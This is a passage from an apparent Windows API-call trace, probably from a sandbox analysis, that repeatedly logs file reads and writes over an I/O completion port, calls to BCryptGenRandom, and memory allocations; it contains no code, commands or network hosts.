lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.338] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.339] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.339] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.442] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3cb, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.442] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.443] CloseHandle (hObject=0x3cc) returned 1 [0204.443] free (_Block=0x3df0008) [0204.443] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.451] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.451] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.451] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.452] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.452] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.452] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.452] free (_Block=0x3e305b8) [0204.452] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.452] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.453] free (_Block=0x1fa91d0) [0204.453] free (_Block=0x1fa2ed8) [0204.453] free (_Block=0x1fa90b8) [0204.453] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.453] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.453] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.454] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.465] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x6c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.465] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.466] CloseHandle (hObject=0x3cc) returned 1 [0204.466] free (_Block=0x3df0008) [0204.466] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.474] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.475] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.475] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.475] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.475] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.475] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.475] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.476] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.476] free (_Block=0x3e305b8) [0204.476] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.476] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.476] free (_Block=0x1fa91d0) [0204.476] free (_Block=0x1fa2ed8) [0204.476] free (_Block=0x1fa90b8) [0204.476] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.477] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.477] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.477] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.488] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.488] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.489] CloseHandle (hObject=0x3cc) returned 1 [0204.489] free (_Block=0x3df0008) [0204.489] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.500] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.501] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.501] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.501] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.501] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.501] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.501] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.501] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.501] free (_Block=0x3e305b8) [0204.502] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.502] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.502] free (_Block=0x1fa91d0) [0204.502] free (_Block=0x1fa2ed8) [0204.502] free (_Block=0x1fa90b8) [0204.502] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.502] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.503] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.503] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.515] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xf5, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.515] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.515] CloseHandle (hObject=0x3cc) returned 1 [0204.515] free (_Block=0x3df0008) [0204.515] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.523] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.523] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.523] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.524] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.524] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.524] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.524] free (_Block=0x3e305b8) [0204.524] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.524] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.525] free (_Block=0x1fa91d0) [0204.525] free (_Block=0x1fa2ed8) [0204.525] free (_Block=0x1fa90b8) [0204.525] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.525] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.525] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.526] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.537] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xc8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.537] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.537] CloseHandle (hObject=0x3cc) returned 1 [0204.537] free (_Block=0x3df0008) [0204.537] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.545] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.546] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.546] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.546] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.546] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.547] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.547] free (_Block=0x3e305b8) [0204.547] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.547] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.547] free (_Block=0x1fa91d0) [0204.547] free (_Block=0x1fa2ed8) [0204.547] free (_Block=0x1fa90b8) [0204.547] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.547] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.547] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.548] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.558] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.558] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.558] CloseHandle (hObject=0x3cc) returned 1 [0204.558] free (_Block=0x3df0008) [0204.558] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.572] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.572] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.574] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.574] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.574] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.575] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.575] free (_Block=0x3e305b8) [0204.575] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.575] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.575] free (_Block=0x1fa91d0) [0204.575] free (_Block=0x1fa2ed8) [0204.575] free (_Block=0x1fa90b8) [0204.575] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.576] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.576] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.576] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.587] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.587] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.587] CloseHandle (hObject=0x3cc) returned 1 [0204.587] free (_Block=0x3df0008) [0204.587] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.596] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.596] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.596] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.596] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.597] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.597] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.597] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.597] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.597] free (_Block=0x3e305b8) [0204.597] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.597] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.598] free (_Block=0x1fa91d0) [0204.598] free (_Block=0x1fa2ed8) [0204.598] free (_Block=0x1fa90b8) [0204.598] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.598] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.598] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.599] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.612] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe9, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.612] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.612] CloseHandle (hObject=0x3cc) returned 1 [0204.612] free (_Block=0x3df0008) [0204.612] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.621] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.621] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.621] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.621] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.621] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.622] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.622] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.622] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.622] free (_Block=0x3e305b8) [0204.622] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.622] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.622] free (_Block=0x1fa91d0) [0204.622] free (_Block=0x1fa2ed8) [0204.622] free (_Block=0x1fa90b8) [0204.622] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.623] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.623] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.623] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.635] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x101, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.635] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.635] CloseHandle (hObject=0x3cc) returned 1 [0204.635] free (_Block=0x3df0008) [0204.635] GetQueuedCompletionStatus (in: CompletionPort=0x14c, 